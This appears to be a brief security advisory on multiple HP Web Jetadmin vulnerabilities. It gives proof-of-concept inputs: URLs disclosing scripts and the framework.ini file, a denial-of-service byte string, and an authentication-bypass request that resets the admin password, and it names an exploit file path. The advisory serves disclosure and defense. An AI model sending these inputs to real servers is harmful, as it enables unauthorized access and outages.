HP Web Jetadmin Multiple Vulnerabilities

HP Web Jetadmin Multiple Vulnerabilities

The following proof of concept examples have been supplied:

Disclosure of scripts:
http://www.example.com:8000/plugins/hpjwja/script/devices_list.hts.

framework.ini file disclosure:
http://www.example.com:8000/plugins/framework/framework.ini

Denial of service:
01010101FFFF02020202020202020202

Bypassing authentication to access various functions:
obj=Httpd:SetProfile(Profiles_Admin,password,$_pwd,$__framework_ini)

An exploit to gain root or SYSTEM access to a vulnerable server has been provided:

/data/vulnerabilities/exploits/jetadmin_exp.pl